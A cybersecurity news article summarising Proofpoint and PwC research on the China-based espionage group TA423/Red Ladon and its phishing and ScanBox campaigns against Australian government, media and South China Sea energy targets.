Chinese hacker group TA423 targets Australian governmental entities, countries in South China Sea

Researchers at Proofpoint and PwC Threat Intelligence provided details of TA423/Red Ladon, a China-based, espionage-motivated hacker campaign with an international reach. The group maintains a heavy focus on the Asia Pacific region, Australian governmental entities, and companies and countries operating in the South China Sea, and has been active since 2013. Additionally, the details provide a ‘moderate confidence assessment’ that recent campaigns targeting the federal government, energy, and manufacturing sectors globally may represent recent efforts by TA423/Red Ladon.

An April to June 2022 ScanBox campaign primarily targeted local and federal Australian governmental agencies, Australian news media companies, and global heavy industry manufacturers, which conduct maintenance of fleets of wind turbines in the South China Sea, the researchers said in a blog post. The targeted organizations include defense contractors, manufacturers, universities, government agencies, legal firms involved in diplomatic disputes, and foreign companies involved with Australasian policy or the South China Sea operations.    

“This demonstrated the co-mingling of targets involved in Australian governmental affairs as well as offshore energy production in the South China Sea,” according to a Proofpoint blog post. “Proofpoint previously observed similar targeting in June 2021 by TA423/Red Ladon, wherein the threat actor would deliver a downloader in DLL format via RTF template injection. The campaign showed a consistency of victimology spanning thirteen months and bridging diverse phishing tactics, techniques, and procedures (TTPs),” it added.

The researchers provided technical evolution of the observed campaigns in three phases. The first phase of the campaign covered March to September 2021, and consisted of phishing targeting users in Australia and Malaysia, the post said. “The emails delivered Zip Archive attachments containing RTF template injection files as well as in some cases simply RTF attachments (not contained in Zip archives). These files would retrieve either further Zip archives or macro-laden Word documents using RTF template injection which serve as a next stage downloader,” it added.  

“Regardless of the nature of the downloader, the following stage payload would consist of a legitimate PE and a malicious DLL stager,” the researchers said. “This DLL stager is executed using DLL sideloading and communicates with a threat actor-controlled server to retrieve a response encoded with a single-byte XOR. The decoded response is Meterpreter shellcode which is executed on the victim’s machine.”  

“Similarly to ScanBox activity in April 2022 to June 2022, several of the domains utilized to deliver malware payloads and to communicate with threat actor C2 servers were themed around Australian news media,” the post added. “Most notably, the domains impersonated ‘The Australian’ and ‘Herald Sun.’”

The second observed phase of the campaign occurred in March this year and consisted of phishing campaigns that used RTF template injection attachments leveraging template URLs that were customized for each target. Despite returning the same payload to all victims, these URLs were distinct, with each including a victim ID number that correlated to the intended victims, allowing the threat actor to track active infections based on the initial URL beacons to the staging server.   

The researchers said that the third phase of the ongoing campaign, between April to June this year, consisted of malicious Australian media-themed URLs delivered in phishing emails. These URLs utilized victim-specific URLs in some instances and redirected users to a website posing like that as an Australian media-themed site. While this version of ScanBox has been customized to download subsequent modules, it is unencoded and heavily resembles earlier versions of the standard ScanBox code base. 

This phase of the campaign originated from Gmail and Outlook email addresses which Proofpoint assesses with moderate confidence were created by the threat actor, and utilized a variety of subjects including ‘Sick Leave,’ ‘User Research,’ and ‘Request Cooperation,’ the researchers said. The hacker would frequently pose as an employee of the fictional media publication ‘Australian Morning News.’ providing a URL to the malicious domain and soliciting targets to view its website or share research content that the website would publish. 

In emails, the hacker claimed to be starting a ‘humble news website’ and solicited user feedback while providing a link to australianmorningnews[dot]com. “While this is not impersonating an existing Australian media publication, it does copy content from legitimate news publications (including the BBC and Sky News) which were then displayed when victims navigated to the website,” the post added.   

Proofpoint said that upon clicking the link and redirecting to the site, visitors were served the ScanBox framework. The impersonation of a fictional media publication local to targets of interest is a tactic that Proofpoint and PwC Threat Intelligence had previously observed being used in historic TA423/Red Ladon ScanBox campaigns identified preceding the Cambodian elections in 2018. “The content of the emails and the malicious URL technique reprised a technique previously observed in September 2021 TA423/Red Ladon campaigns detailed later in this blog, in which the threat actor impersonated Australian media publications with its malware delivery infrastructure,” it added.

PwC Threat Intelligence assesses it is highly likely that ScanBox is shared privately amongst multiple China-based threat actors. Other China-based hackers that have been observed using ScanBox, include Red Sylvan (a.k.a. APT3, Gothic Panda), Red Apollo (a.k.a. APT10, Stone Panda), Red Phoenix (a.k.a. APT27, Emissary Panda), TA423/Red Ladon (a.k.a. APT40, Leviathan, GADOLINIUM), Red Dev 16 (a.k.a. Evil Eye, Earth Empusa, Poison Carp), and TA413/White Dev 9 (a.k.a. LuckyCat).  

“TA423/Red Ladon’s 2018 ScanBox activity targeting Cambodia involved domains masquerading as news websites and targeted high profile government entities, including the National Election Commission,” according to the researchers. “One of the ScanBox server domains used in that campaign, mlcdailynews[dot]com, hosted several articles about Cambodian affairs and US and East Asia relations, for which contents were copied from legitimate publications (Khmer Post, Asia Times, Reuters, Associated Press). These were likely used as lures in phishing emails to convince targets to follow malicious links to the actor-controlled ScanBox domain,” they added. 

The campaign has an international reach, but a heavy focus on the Asia Pacific region, Australian governmental entities, and companies and countries operating in the South China Sea, the post said. “In particular, Proofpoint has observed TA423/Red Ladon targeting entities directly involved with development projects in the South China Sea closely around the time of tensions between China and other countries related to development projects of high strategic importance, such as the Kasawari Gas field developed by Malaysia, and an offshore wind farm in the Strait of Taiwan,” it added. 

“From an operational perspective, other than its custom toolset and offensive security tools like Meterpreter, TA423/Red Ladon has also returned to ScanBox. The last time that TA423/Red Ladon was publicly documented using ScanBox was in 2018,” the researchers said. “While ScanBox activity has been reported more sporadically since its first appearance in 2014 and heavy use in 2015, it remains a tool available to and shared among, China-based threat actors to selectively deploy in campaigns. We have observed TA423/Red Ladon using ScanBox, both in 2018 and 2022, in campaigns using an upcoming national election as a lure, wherein the threat actor built local news-themed malicious websites to draw targets to in order to infect them,” it added. 

Following the U.S. Department of Justice indictment and public disclosure last July, Proofpoint analysts have not observed a distinct disruption of operational tempo specifically for phishing campaigns associated with TA423/Red Ladon, the post said. “While the indictment attributed this threat actor to a specific entity operating with the support of a Chinese state intelligence agency, the technical details included did not cover the tactics currently in use by the group in the wild. As a result, the group was free to continue its usage of novel phishing techniques like RTF Template Injection which began in early 2021 (before the indictment) and persisted through March 2022,” it added.  

Proofpoint and PwC collectively expect TA423/Red Ladon to continue pursuing its intelligence-gathering and espionage mission primarily targeting countries in the South China Sea, as well as further intrusions in Australia, Europe, and the U.S., the post said. 

Last month, Proofpoint researchers detailed the TA558 hacker group, a likely financially motivated small crime threat actor, which has been targeting hospitality, hotel, and travel organizations. The group’s target focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.